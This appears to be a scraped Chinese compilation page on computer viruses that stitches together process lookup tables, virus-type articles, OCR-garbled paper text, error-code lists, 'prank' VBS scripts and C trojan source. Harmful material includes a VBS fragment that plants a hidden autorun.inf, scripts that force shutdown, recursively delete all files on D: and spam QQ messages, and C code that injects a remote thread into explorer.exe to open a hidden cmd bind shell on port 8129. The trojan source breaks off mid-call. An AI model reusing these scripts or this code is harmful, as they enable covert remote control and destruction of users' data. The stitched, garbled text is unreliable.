病毒代码大全

合集下载

病毒进程大全

病毒进程大全
Absr.exe → Backdoor.Autoupder Mmc.exe → 尼姆达病毒
Aplica32.exe → 将死者病毒 Mprdll.exe → Bla
Avconsol.exe → 将死者病毒 Msabel32.exe → Cain and Abel
Internet.exe → 网络神偷 Sysrunt.exe → Ripper
Kernel16.exe → Transmission Scount System.exe → s**tHeap
Kernel32.exe → 坏透了或冰河 System32.exe → DeepThroat 1.0
Bbeagle.exe → 恶鹰蠕虫病毒 Msie5.exe → Canasson
Brainspy.exe → BrainSpy vBeta Msstart.exe → Backdoor.livup
Cfiadmin.exe → 将死者病毒 Mstesk.exe → Doly 1.1-1.5
Winzip.exe → ShadowPhyre Wqk.exe → 求职信病毒 常见病毒、木马进程速查表
exe → BF Evolution Mbbmanager.exe → 聪明基因
_.exe → Tryit Mdm.exe → Doly 1.6-1.7
Diagcfg.exe → 广外女生 Pcx.exe → Xplorer
Dkbdll.exe → Der Spaeher Pw32.exe → 将死者病毒
Dllclient.exe → Bobo Recycle - Bin.exe → s**tHeap
Vw32.exe → 将死者病毒 Windown.exe → Spirit 2000 1.2

电脑病毒种类大全有哪些

电脑病毒种类大全有哪些

电脑病毒种类大全有哪些导读:我根据大家的需要整理了一份关于《电脑病毒种类大全有哪些》的内容,具体内容:电脑病毒种类有很多很多,你知道多少种呢?跟着我去看看!下面由我给你做出详细的介绍!希望对你有帮助!电脑病毒种类介绍一:电脑病毒种类1、系统病毒系统病毒的前缀为...电脑病毒种类有很多很多,你知道多少种呢?跟着我去看看!下面由我给你做出详细的介绍!希望对你有帮助!电脑病毒种类介绍一:电脑病毒种类1、系统病毒系统病毒的前缀为:Win32、PE、Win95、W32、W95等。

这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。

如CIH病毒。

电脑病毒种类2、蠕虫病毒蠕虫病毒的前缀是:Worm。

这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。

比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。

电脑病毒种类3、木马病毒、黑客病毒木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack 。

木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。

木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。

现在这两种类型都越来越趋向于整合了。

一般的木马如QQ消息尾巴木马 Trojan.QQ3344 ,还有大家可能遇见比较多的针对网络游戏的木马病毒如Trojan.LMir.PSW.60 。

这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为"密码"的英文"password"的缩写)一些黑客程序如:网络枭雄(her.Client)等。

电脑病毒种类4、脚本病毒脚本病毒的前缀是:Script。

病毒大全

病毒大全

病毒
名字传播方式作者名字
梅丽莎病毒邮件大卫·L·史密斯爱虫病毒
熊猫烧香下载李俊金猪报喜
冲击波病毒RPC漏洞杰弗里.李.帕森鬼影病毒
宏病毒文档 模板未知特洛伊木马中华吸血鬼网页挂马 U盘小周冰河木马
广外女生下载未知震荡波
瘦男孩下载Lanker-boy欢乐时光病毒爱情后门病毒网络/邮件未知求职信病毒红色代码邮件 Web服务器 文件共享Marc Maiffret和Ryan Permeh CIH病毒
米开朗基罗下载未知大麻病毒
机器狗病毒U盘 移动硬盘 网页挂马Coderui极虎病毒
磁碟机病毒U盘 局域网ARP攻击 下载未知AV终结者
莫里斯蠕虫邮件 下载罗伯特·泰潘·莫里斯震网病毒
超级工厂病毒下载未知火焰病毒
尼姆达病毒邮件 文件共享 IIS服务器小方
传播方式作者
邮件古斯曼
IE漏洞李俊
下载未知
下载RichardCHonour U盘 邮箱 qq Mask
RPC漏洞杰弗里.李.帕森邮件未知
邮件 局域网未知
网络陈盈豪
软盘未知
IE极光ODAY漏洞未知
下载 捆绑未知
U盘未知
蓝牙功能 代码签名未知。

病毒编写指令大全

病毒编写指令大全
file.close
dirc=chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97)) '定义一个变量,赋值是随机的
set file=fso.getfile(drivearray(i)&"\hack.txt") '得到hack.txt的句柄
file.writeline "attrib +s +h +r "&drivearray(i)&"\autorun.inf"
file.writeline "attrib +s +h +r "&drivearray(i)&"\"&dirc&".vbs"
file.close
set file=fso.getfile(drivearray(i)+"\hack.txt")
file.writeline "shell/oth/command="&dirc&".vbs"
file.close
set file=fso.getfile(drivearray(i)+"\autorun.txt") '这里不用说啦吧,获得句柄
file.copy(drivearray(i)+"\autorun.inf") '复制自身为autorun.inf

浅谈防范计算机病毒

浅谈防范计算机病毒
信 息 科 学
科牵5 20襞翥 L 0年 技 1 第期
浅谈 防范计算机病毒
罗建华
( 江县信息 中心 ,黑龙 江齐齐 哈尔 1 10 龙 6 0) 1
摘 要 随着计算 机在社会生活各个领 域的广泛运用 ,以及电脑 的普及 和网络的迅猛发展 ,计算机病毒呈现 愈演愈烈的趋势 ,严 重地 干扰 了正 常的人类 社会生活 ,给计算机系统带来 了巨大的潜在威胁 和破坏。 目前 ,病毒 已成为困扰计算机 系统安全和计算机应 用的重大f题 。 目 为 了确保信 息的安全与畅通 ,从计算机病毒 的概 念人手 ,分析计算 机病毒的 内涵及类 型 ,并对计算机 病毒来源进行分析 ,最后介绍计算机
强 ,破坏性大,产生于内部 , 防不胜防。 4 用于研究 或有益 目的而设计 的程序 , 由于某种原 因失去控制或 ) 产生了意想不到的效果 。
3 计 算机 病毒 防范措 施
1 )应养成及时下 载最新 系统安全漏洞补丁的安全习惯 ,从根源上 杜绝黑客利用系统漏洞攻击用户计算机的病毒。同时 , 升级杀毒软件、 开启病毒实时监控应成为每 日防范病毒 的必修课 。 2 )定期做好重要资料的备份 ,以免造成重大损失。 3 选 择具 备 “ ) 网页 防火墙”功能的杀毒软件,每天升级杀毒软件 病毒J 定时对计算机进行病毒查杀 ,上网时开启杀毒软件全部监控。 车, 4)不要随便打开来源不明的E cl xe或Wod r文档 ,并且要及时升级病 毒库 ,开启实时监控 ,以免受到病毒 的侵害。 5)上 网浏览时一定要开启 杀毒软件的实 时监控功能 ,以免遭到病 毒侵害。 6 网浏览时 ,不要随便 点击不安全 陌生 网站 ,以免遭 到病毒侵 )
f] 2姬志 刚. q 开始认 识网络安全 『 . 从 q J 中国科 教博览,0 4 . 1 2 0 , 9

电脑蓝屏代码大全(完美版)

电脑蓝屏代码大全(完美版)

电脑蓝屏代码大全0X0000000 操作完成0X0000001 不正确的函数0X0000002 系统找不到指定的文件0X0000003 系统找不到指定的路径0X0000004 系统无法打开文件0X0000005 拒绝存取0X0000006 无效的代码0X0000007 内存控制模块已损坏0X0000008 内存空间不足,无法处理这个指令0X0000009 内存控制模块位址无效0X000000A 环境不正确0X000000B 尝试载入一个格式错误的程序0X000000C 存取码错误0X000000D 资料错误0X000000E 内存空间不够,无法完成这项操作0X000000F 系统找不到指定的硬盘0X0000010 无法移除目录0X0000011 系统无法将文件移到其他的硬盘0X0000012 没有任何文件0X0000019 找不到指定扇区或磁道0X000001A 指定的磁盘或磁片无法存取0X000001B 磁盘找不到要求的装置0X000001C 打印机没有纸0X000001D 系统无法将资料写入指定的磁盘0X000001E 系统无法读取指定的装置0X000001F 连接到系统的某个装置没有作用0X0000021文件的一部分被锁定,现在无法存取0X0000024 开启的分享文件数量太多0X0000026 到达文件结尾0X0000027 磁盘已满(可以清理磁盘!一个磁盘尽量不要装太满!!)0X0000036 网络繁忙0X000003B 网络发生意外的错误0X0000043 网络名称找不到0X0000050 文件已经存在0X0000052 无法建立目录或文件0X0000053 INT24失败(什麼意思?还请高手指点站长一二)0X000006B 因为代用的磁盘尚未插入,所以程序已经停止0X000006C 磁盘正在使用中或被锁定0X000006F 文件名太长0X0000070 硬盘空间不足0X000007F 找不到指定的程序0X000045B 系统正在关机0X000045C 无法中止系统关机,因为没有关机的动作在进行中0X000046A 可用服务器储存空间不足0X0000475 系统BIOS无法变更系统电源状态0X000047E 指定的程序需要新的windows版本0X000047F 指定的程序不是windwos或ms-dos程序0X0000480 指定的程序已经启动,无法再启动一次0X0000481 指定的程序是为旧版的 windows所写的0X0000482 执行此应用程序所需的程序库文件之一被损0X0000483 没有应用程序与此项操作的指定文件建立关联0X0000484 传送指令到应用程序无效0X00005A2 指定的装置名称无效0X00005AA 系统资源不足,无法完成所要求的服务0X00005AB系统资源不足,无法完成所要求的服务0X00005AC系统资源不足,无法完成所要求的服务110 0x006E 系统无法开启指定的装置或档案。

电脑病毒大全

电脑病毒大全

电脑病毒大全电脑病毒大全提起计算机病毒,相信绝大多数用户都不会陌生(即使那些没有接触过计算机的人大多也听说过),有些用户甚至还对计算机病毒有着切肤之痛,不过要问起计算机病毒是如何产生的、病毒到底有些什么特征,能够回答生来的用户可能并不多。

为此,本人特将有关计算机病毒的定义、起源、历史、特征、传播途径、分类、最新动态、错误认识、防毒原则、解决病毒的办法等内容汇集成文,希望能对广大用户曰常的反病毒操作有所帮助:一、病毒定义'计算机病毒是指那些具有自我复制能力的计算机程序,它能影响计算机软件、硬件的正常运行,破坏数据的正确与完整。

& b5 ?% S9 {% U' C* D4 `1 F' U* w$二、病毒起源计算机病毒的来源多种多样,有的是计算机工作人员或业余爱好者为了纯粹寻开心而制造出来的,有的则是软件公司为保护自己的产品被非法拷贝而制造的报复性惩罚,因为他们发现病毒比加密对付非法拷贝更有效且更有威胁,这种情况助长了病毒的传播。

还有一种情况就是蓄意破坏,它分为个人行为和ZF行为两种。

个人行为多为雇员对雇主的报复行为,而ZF行为则是有组织的战略战术手段(据说在海湾战争中,美国防部一秘密机构曾对伊拉克的通讯系统进行了有计划的病毒攻击,一度使伊拉克的国防通讯陷于瘫痪)。

另外有的病毒还是用于研究或实验而设计的"有用"程序,由于某种原因失去控制扩散出实验室或研究所,从而成为危害四方的计算机病毒。

$ X# x* p% v5 A$ o;三、病毒历史病毒是如何一步步的从无到有、从小到大的发展到今天的地步的呢?下面的介绍可以解除你的这一疑问:概念的提出"计算机病毒"这一概念是1977年由美国著名科普作家"雷恩"在一部科幻小说《P1的青春》中提出X1983年美国计算机安全专家"考因"首次通过实验证明了病毒的可实现性。

代码大全VBS格式

代码大全VBS格式
ws.run "notepad",3 : wscript.sleep 2000
verybat=split("dear ,friends ,~, nice ,to ,meet ,you ,i ,am ,so ,sorry ,that ,i ,controled ,your ,computer, without ,you ,allowing,~,please ,excuse ,me ,i ,want ,to ,say ,to ,you ,today,~,my ,friends ,so ,even ,through ,we ,face ,the ,difficulties ,of ,today ,and ,tomorrow,~,still ,have ,a ,dream ,it ,is ,a ,dream ,deeply ,rooted ,in ,our ,common ,dreams ,~,Maybe ,it's ,true ,that ,we ,do ,not ,know ,what ,we ,have ,got ,until ,we ,lose ,it,~,but ,it ,is ,also ,true ,that ,we ,do ,not ,know ,what ,we ,have ,been ,missing ,until ,it ,arrives ,.see ,you ,later ,~,with ,the ,best ,wishes,~, yours,~, lhj",",")
msgbox "你SB啊!"
else
msgbox "还不承认!! 作为惩罚,蓝屏一下,你马上挂了#¥!@#¥%@……#……?",64,"严重警告!!!!!!!!!"

木马名称大全

木马名称大全
Avconsol.exe → 将死者病毒
Avp.exe → 将死者病毒
Avp32.exe → 将死者病毒
Avpcc.exe → 将死者病毒
Avpm.exe → 将死者病毒
Avserve.exe → 震荡波病毒
Bbeagle.exe → 恶鹰蠕虫病毒
Brainspy.exe → BrainSpy vBeta
木马名称ห้องสมุดไป่ตู้全
进程名称→ 木马病毒对照表
常见病毒木马进程
进程名称 → 对应的病毒/木马
.exe → BF Evolution
_.exe → Tryit
Aboutagirl.exe → 初恋情人
Absr.exe → Backdoor.Autoupder
Aplica32.exe → 将死者病毒
Service.exe → Trinoo
Setup.exe → 密码病毒或Xanadu
Sockets.exe → Vampire
Something.exe → BladeRunner
Spfw.exe → 瑞波变种PX
Svchost.exe(线程105) → 蓝色代码
Sysedit32.exe → SCKISS爱情森林
Winmgm32.exe → 巨无霸病毒
Winprot.exe → Chupachbra
Winrpc.exe → 恶邮差病毒
Winserv.exe → Softwarst
Winupdate.exe → Sckiss爱情森林
Winvnc.exe → 恶邮差病毒
Wqk.exe → 求职信病毒
Rundll32.exe → 狩猎者病毒

http状态码大全(404、505、502,500)

http状态码大全(404、505、502,500)

http状态码⼤全(404、505、502,500)HTTP 400 – 请求⽆效HTTP 401.1 – 未授权:登录失败HTTP 401.2 – 未授权:服务器配置问题导致登录失败HTTP 401.3 – ACL 禁⽌访问资源HTTP 401.4 – 未授权:授权被筛选器拒绝HTTP 401.5 – 未授权:ISAPI 或 CGI 授权失败HTTP 403 – 禁⽌访问HTTP 403 – 对 Internet 服务管理器的访问仅限于 LocalhostHTTP 403.1 禁⽌访问:禁⽌可执⾏访问HTTP 403.2 – 禁⽌访问:禁⽌读访问HTTP 403.3 – 禁⽌访问:禁⽌写访问HTTP 403.4 – 禁⽌访问:要求 SSLHTTP 403.5 – 禁⽌访问:要求 SSL 128HTTP 403.6 – 禁⽌访问:IP 地址被拒绝HTTP 403.7 – 禁⽌访问:要求客户证书HTTP 403.8 – 禁⽌访问:禁⽌站点访问HTTP 403.9 – 禁⽌访问:连接的⽤户过多HTTP 403.10 – 禁⽌访问:配置⽆效HTTP 403.11 – 禁⽌访问:密码更改HTTP 403.12 – 禁⽌访问:映射器拒绝访问HTTP 403.13 – 禁⽌访问:客户证书已被吊销HTTP 403.15 – 禁⽌访问:客户访问许可过多HTTP 403.16 – 禁⽌访问:客户证书不可信或者⽆效HTTP 403.17 – 禁⽌访问:客户证书已经到期或者尚未⽣效 HTTP 404.1 -⽆法找到 Web 站点HTTP 404- ⽆法找到⽂件HTTP 405 – 资源被禁⽌HTTP 406 – ⽆法接受HTTP 407 – 要求代理⾝份验证HTTP 410 – 永远不可⽤HTTP 412 – 先决条件失败HTTP 414 – 请求 – URI 太长HTTP 500 – 内部服务器错误HTTP 500.100 – 内部服务器错误 – ASP 错误HTTP 500-11 服务器关闭HTTP 500-12 应⽤程序重新启动HTTP 500-13 – 服务器太忙HTTP 500-14 – 应⽤程序⽆效HTTP 500-15 – 不允许请求 global.asaError 501 – 未实现HTTP 502 – ⽹关错误⽤户试图通过 HTTP 或⽂件传输协议 (FTP) 访问⼀台正在运⾏ Internet 信息服务 (IIS) 的服务器上的内容时,IIS 返回⼀个表⽰该请求的状态的数字代码。

世界上电脑病毒20种介绍大全

世界上电脑病毒20种介绍大全

世界上电脑病毒20种介绍大全你知道世界上有多少种电脑病毒吗!下面由店铺为您提供世界上电脑病毒20种介绍大全,希望能帮助您。

世界上电脑病毒20种介绍大全:1.Creeper(1971年)最早的计算机病毒Creeper(根据老卡通片《史酷比(Scooby Doo )》中的一个形象命名)出现在1971年,距今以后42年之久。

当然在那时,Creeper还尚未被称为病毒,因为计算机病毒尚不存在。

Creeper由BBN技术公司程序员罗伯特•托马斯(Robert Thomas)编写,通过阿帕网( ARPANET,互联网前身)从公司的DEC PDP-10传播,显示“我是Creeper,有本事来抓我呀!(I'm the creeper, catch me if you can!)”。

Creeper在网络中移动,从一个系统跳到另外一个系统并自我复制。

但是一旦遇到另一个Creeper,便将其注销。

2.Elk Cloner病毒(1982年)里奇•斯克伦塔(Rich Skrenta)在一台苹果计算机上制造了世界上第一个计算机病毒。

1982年,斯克伦塔编写了一个通过软盘传播的病毒,他称之为“Elk Cloner”,那时候的计算机还没有硬盘驱动器。

该病毒感染了成千上万的机器,但它是无害的:它只是在用户的屏幕上显示一首诗,其中有两句是这样的:“它将进入你所有的磁盘/它会进入你的芯片。

”3.梅利莎 (Melissa,1999年)Melissa病毒由大卫•史密斯(David L. Smith)制造,是一种迅速传播的宏病毒,它作为电子邮件的附件进行传播,梅丽莎病毒邮件的标题通常为“这是你要的资料,不要让任何人看见(Here is that document you asked for,don't show anybody else)”。

一旦收件人打开邮件,病毒就会自我复制,向用户通讯录的前50位好友发送同样的邮件。

因为它发出大量的邮件形成了极大的电子邮件信息流,它可能会使企业或其它邮件服务端程序停止运行,尽管Melissa病毒不会毁坏文件或其它资源。

整人病毒vbs大全!

整人病毒vbs大全!

整⼈病毒vbs⼤全!新建⼀个记事本把代码复制进去重名名为vbs格式的就可以了解除这个vbs脚本的办法就简单了只要关掉任务管理器⾥Wscript.exe这个进程就好了1、你打开好友的聊天对话框,然后记下在你QQ⾥好友的昵称,把下⾯代码⾥的xx替换⼀下,就可以⾃定义发送QQ信息到好友的次数(代码⾥的数字10改⼀下即可).xx.vbs=>—————————————————————————代码如下:On Error Resume NextDim wsh,yeset wsh=createobject(“wscript.shell”)for i=1 to 10wscript.sleep 700wsh.AppActivate(“与 xx 聊天中“)wsh.sendKeys “^v”wsh.sendKeys iwsh.sendKeys “%s”nextwscript.quit—————————————————————————2、我就⽤这个程序放在学校图书馆查询书刊的机器上,好多⼈都那它没办法,哈哈—————————————————————————代码如下:domsgbox “You are foolish!”loop—————————————————————————3、直接关机—————————————————————————代码如下:dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “shutdown -f -s -t 00”,0 ,true—————————————————————————4、删除D:\所有⽂件—————————————————————————代码如下:dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true —————————————————————————5、不断弹出窗⼝—————————————————————————代码如下:while(1)msgbox “哈哈你被耍了!“loop—————————————————————————6、不断按下alt+f4 (开什么都关闭……)病毒太强必须关机才⾏!—————————————————————————代码如下:dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)while(1)WSHshell.SendKeys “%{F4}”Wend—————————————————————————7、按500次回车(以下代码在运⾏者的电脑上显⽰500个对话框。

vbs代码大全

vbs代码大全
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"

代码大全

代码大全
10000"。下面是最简单的实现代码:
res = ""
For i = 1 to 10000: res = res & Str(i): Next
<>
face=宋体>代码虽然简单,但问题也很明显:Res变量将被重分配10000次。下面的代码实现同样的目的,但效果明显好转:
Dim res As String
删除"D:\1.txt":
Kill "D:\1.txt"
新建文件夹"D:\123":
MkDir "d:\123"
复制文件,由桌面的"1.txt"复制到"D:\1.txt":
FileCopy "C:\Documents and Settings\Administrator\桌面\1.txt", "D:\1.txt"
’填充字符串的相应区间段数值
Mid$(res, index, length) = substr
’调整指针变量
index = index + length
Next
’删除多余字符
res = Left$(res, index - 1)
测试表明:在一个333MHz的计算机上,前段代码执行时间为2.2秒,后者仅仅为0.08秒!代码虽然长了些,可是速度却提高了25倍之多。呵呵,由此看来:代码也不可貌相啊
------------------------------------------------------------------------------------------------------

世界计算机病毒大全

世界计算机病毒大全

世界计算机病毒大全有时候想要了解下计算机病毒,但不知道该怎么样去了解,该怎么办呢?下面是店铺收集整理的世界计算机病毒大全,希望对大家有帮助~~世界计算机病毒大全介绍一1.CreeperCreeper可能是第一个计算机病毒,尽管这种说法还有争议。

这个病毒是在1971年由BobThomas使用Tenex操作系统制作的。

2.BrainBrain是在1986年年中出现的第一个用微软DOS操作系统制作的病毒。

这个病毒是巴基斯坦的两兄弟Basit和AmjadFarooq Alvi编写的,原来是用于阻止拷贝一个医药软件的。

3. MyDoomMyDoom是感染主机,然后重新发送整个地址簿的攻击方式。

这种病毒使用经过检验而可靠的方法通过电子邮件和地址簿传播。

4. Nimda尼姆达(Nimda)是历史上传播速度最快的病毒之一,在上线之后的22分钟之后就成为传播最广的病毒。

5. Melissa这是一个浪漫的爱情故事。

一个男孩遇到了一个女该。

女孩靠跳舞赚钱,男孩回家为那个女孩编写计算机病毒。

这个计算机病毒后来流传了出去,造成了数百万美元的损失。

这是我们这个时代的罗密欧与朱丽叶。

6. StormStorm是一个大型的恶意僵尸网络病毒,是在2007年年初以欧洲发洪水的假新闻的形式首先出现的。

这个病毒给用户造成的威胁有一年多的时间。

7. ExploreZipExploreZip病毒是在10年前编写的,但是,这种病毒目前仍在传播。

这是病毒如此顽强的一个很好的例子。

8. ConfickerConficker.C病毒原来要在今年3月进行大量传播,然后在4月1日实施全球性攻击,引起全球性灾难。

不过,这种病毒实际上没有造成什么破坏。

9. KlezKlez也是一种非常顽强的病毒。

在首次出现7年之后,这种病毒目前仍在传播。

10. Elk ClonerElk Cloner病毒是一个15岁的高中学生RichSkrenta为了开玩笑而编写的。

遗憾的是他的玩笑很快就变成了坏事。

计算机病毒种类大全有哪些呢

计算机病毒种类大全有哪些呢

计算机病毒种类大全有哪些呢计算机病毒种类介绍:计算机病毒种类1、木马病毒。

木马病毒其前缀是:trojan,其共有特性以盗取用户信息为目的。

计算机病毒种类2、系统病毒。

系统病毒的前缀为:win32、pe、win95、w32、w95等。

其主要感染windows系统的可执行文件。

计算机病毒种类3、蠕虫病毒。

蠕虫病毒的前缀是:worm。

其主要是通过网络或者系统漏洞进行传播计算机病毒种类4、脚本病毒。

脚本病毒的前缀是:。

其特点是采用脚本语言编写。

计算机病毒种类5、后门病毒。

后门病毒的前缀是:backdoor。

其通过网络传播,并在系统中打开后门。

计算机病毒种类6、宏病毒。

其实宏病毒是也是脚本病毒的一种,其利用ms office文档中的宏进行传播。

计算机病毒种类7.破坏性程序病毒。

破坏性程序病毒的前缀是:harm。

其一般会对系统造成明显的破坏,如格式化硬盘等。

计算机病毒种类8.、玩笑病毒。

玩笑病毒的前缀是:joke。

是恶作剧性质的病毒,通常不会造成实质性的破坏。

计算机病毒种类9.捆绑机病毒捆绑机病毒的前缀是:binder。

这是一类会和其它特定应用程序捆绑在一起的病毒。

这种病毒用它自已的程序意图加入或取代部分操作系统进行工作,具有很强的破坏力,可以导致整个系统的瘫痪。

圆点病毒和大麻病毒就是典型的操作系统型病毒。

计算机病毒种类10、性计算机病毒良性病毒是指其不包含有立即对计算机系统产生直接破坏作用的代码。

这类病毒为了表现其存在,只是不停地进行扩散,从一台计算机传染到另一台,并不破坏计算机内的数据。

有些人对这类计算机病毒的传染不以为然,认为这只是恶作剧,没什么关系。

其实良性、恶性都是相对而言的。

良性病毒取得系统控制权后,会导致整个系统和应用程序争抢cpu的控制权,时时导致整个系统死锁,给正常操作带来麻烦。

有时系统内还会出现几种病毒交叉感染的现象,一个文件不停地反复被几种病毒所感染。

例如原来只有10kb存储空间,而且整个计算机系统也由于多种病毒寄生于其中而无法正常工作。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

制造木马病毒代码大全2008-06-08 19:46 制造木马病毒代码大全一个简单的木马原型基础代码添加上自己的XXX,加上变态的壳,做点小修改,就可以.....#include #pragma comment(lib,"ws2_32.lib") #include #include #pragma comment(lib,"Shlwapi.lib")#include #include #include //参数结构; typedef struct_RemotePara { DWORD dwLoadLibrary; DWORD dwFreeLibrary; DWORD dwGetProcAddress; DWORD dwGetModuleHandle; DWORD dwWSAStartup; DWORD dwSocket; DWORD dwhtons; DWORD dwbind; DWORD dwlisten; DWORD dwaccept; DWORD dwsend; DWORD dwrecv; DWORD dwclosesocket; DWORD dwCreateProcessA; DWORD dwPeekNamedPipe; DWORD dwWriteFile; DWORD dwReadFile; DWORD dwCloseHandle; DWORD dwCreatePipe; DWORD dwTerminateProcess; DWORD dwMessageBox; char strMessageBox[12]; char winsockDll[16]; char cmd[10]; char Buff[4096]; char telnetmsg[60]; }RemotePara; // 提升应用级调试权限BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); // 根据进程名称得到进程ID DWORD GetPidByName(char *szName); // 远程线程执行体DWORD __stdcall ThreadProc(RemotePara *Para){ WSADATA WSAData; WORD nVersion; SOCKET listenSocket; SOCKET clientSocket; struct sockaddr_in server_addr; struct sockaddr_in client_addr; int iAddrSize = sizeof(client_addr); SECURITY_ATTRIBUTES sa; HANDLE hReadPipe1; HANDLE hWritePipe1; HANDLE hReadPipe2; HANDLE hWritePipe2; STARTUPINFO si; PROCESS_INFORMATION ProcessInformation; unsigned long lBytesRead = 0; typedef HINSTANCE (__stdcall*PLoadLibrary)(char*); typedef FARPROC (__stdcall*PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE ); typedef HINSTANCE (__stdcall*PGetModuleHandle)(HMODULE); FARPROC PMessageBoxA; FARPROC PWSAStartup; FARPROC PSocket; FARPROC Phtons; FARPROC Pbind; FARPROC Plisten; FARPROC Paccept; FARPROC Psend; FARPROC Precv; FARPROC Pclosesocket; FARPROC PCreateProcessA; FARPROC PPeekNamedPipe; FARPROC PWriteFile; FARPROC PReadFile; FARPROC PCloseHandle; FARPROC PCreatePipe; FARPROC PTerminateProcess; PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary; PGetProcAddress GetProcAddressFunc =(PGetProcAddress)Para->dwGetProcAddress; PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary; PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle; LoadLibraryFunc(Para->winsockDll); PWSAStartup = (FARPROC)Para->dwWSAStartup; PSocket = (FARPROC)Para->dwSocket; Phtons = (FARPROC)Para->dwhtons; Pbind =(FARPROC)Para->dwbind; Plisten =(FARPROC)Para->dwlisten; Paccept = (FARPROC)Para->dwaccept; Psend =(FARPROC)Para->dwsend; Precv =(FARPROC)Para->dwrecv; Pclosesocket = (FARPROC)Para->dwclosesocket; PCreateProcessA = (FARPROC)Para->dwCreateProcessA; PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe; PWriteFile = (FARPROC)Para->dwWriteFile; PReadFile = (FARPROC)Para->dwReadFile; PCloseHandle = (FARPROC)Para->dwCloseHandle; PCreatePipe = (FARPROC)Para->dwCreatePipe; PTerminateProcess = (FARPROC)Para->dwTerminateProcess; PMessageBoxA = (FARPROC)Para->dwMessageBox; nVersion =MAKEWORD(2,1); PWSAStartup(nVersion, (LPWSADATA)&WSAData); listenSocket =PSocket(AF_INET, SOCK_STREAM, 0); if(listenSocket == INVALID_SOCKET)return 0; server_addr.sin_family =AF_INET; server_addr.sin_port = Phtons((unsigned short)(8129)); server_addr.sin_addr.s_addr =INADDR_ANY; if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;if(Plisten(listenSocket, 5))return 0; clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr,&iAddrSize); // Psend(clientSocket, Para->telnetmsg, 60, 0);if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0; ZeroMemory(&si,sizeof(si)); //ZeroMemory 是C 运行库函数,可以直接调用si.dwFlags =STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1;if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NUL L,NULL,&si,&ProcessInformatio n))return 0; while(1){ memset(Para->Buff,0,4096);PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRe ad,0,0); if(lBytesRead) { if(!PReadFile(hReadPipe1,Para->Buff, lBytesRead, &lBytesRead, 0))break;if(!Psend(clientSocket, Para->Buff, lBytesRead,0))break; }else { lBytesRead=Precv(clientSocket,Para->Buff, 4096, 0); if(lBytesRead <=0 ) break;if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead,&lBytesRead, 0))break; } } PCloseHandle(hWritePipe2); PCloseHandle(hReadPipe1); PCloseHandle(hReadPipe2); PCloseHandle(hWritePipe1); Pclosesocket(listenSocket); Pclosesocket(clientSocket); // PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK); return 0; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { const DWORD THREADSIZE=1024*4; DWORD byte_write; void *pRemoteThread; HANDLE hToken,hRemoteProcess,hThread; HINSTANCE hKernel,hUser32,hSock; RemotePara myRemotePara,*pRemotePara; DWORD pID; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_ PRIVILEGES,&hToken);EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE); // 获得指定进程句柄,并设其权限为PROCESS_ALL_ACCESS pID = GetPidByName("EXPLORER.EXE"); if(pID == 0)return 0; hRemoteProcess =OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);if(!hRemoteProcess)return 0; // 在远程进程地址空间分配虚拟内存pRemoteThread =VirtualAllocEx(hRemoteProcess, 0, THREADSIZE,MEM_COMMIT 